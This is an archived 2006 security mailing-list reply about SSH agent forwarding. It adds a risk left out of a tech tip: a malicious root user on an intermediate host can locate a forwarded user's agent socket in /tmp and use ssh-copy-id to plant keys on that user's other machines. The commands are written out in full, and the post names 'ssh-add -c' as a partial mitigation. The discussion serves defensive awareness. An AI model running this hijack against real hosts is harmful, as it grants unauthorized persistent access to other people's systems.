| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.61.0602241341360.25908@pil.ledge.co.za>
Date: Fri Feb 24 11:54:03 2006
From: andrew2005 at ledge.co.za (Andrew McGill)
Subject: Tech Tip: An Illustrated Guide to SSH Agent
Forwarding
On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,
> Hello all,
>
> While trying to convince a customer that he really needs to get away
> from password auth on his SSH servers, I ended up diving in to make
> some detailed notes on how key agents and forwarding work. The outcome
> of this was a new Tech Tip which explains it in some detail:
>
> Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding
> http://www.unixwiz.net/techtips/ssh-agent-forwarding.html
>
> I hope some find this helpful.
>
> Regards,
> Steve
Here's something you missed in the "Cons" section of agent
forwarding:
lala@...al: ssh-add
lala@...al: (enter key)
lala@...al: ssh -A customer
lala@...tomer: ssh remote
lala@...ote: sleep 86400
And while you are sleeping:
root@...tomer does this:
export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`
ssh-copy-id lala@...ote
ssh-copy-id lala@...al
ssh-copy-id lala@...ercustomer
ssh-copy-id lala@...aland
(Oops) (that's a lot easier than subverting ssh to insert
something evil into the stream that will hack into the remote)
If there are untrusted machines involved you may prefer this:
ssh-add -c
Note that ssh-agent does not identify the origin of requests for
authentication (a bug?), so its confirmation is not fail-safe.
&:-)
--
Leading Edge Business Solutions +27 11 656 0360
Linux Training, Software and Networking http://ledge.co.za/
Linux - laai niks anders
Powered by blists - more mailing lists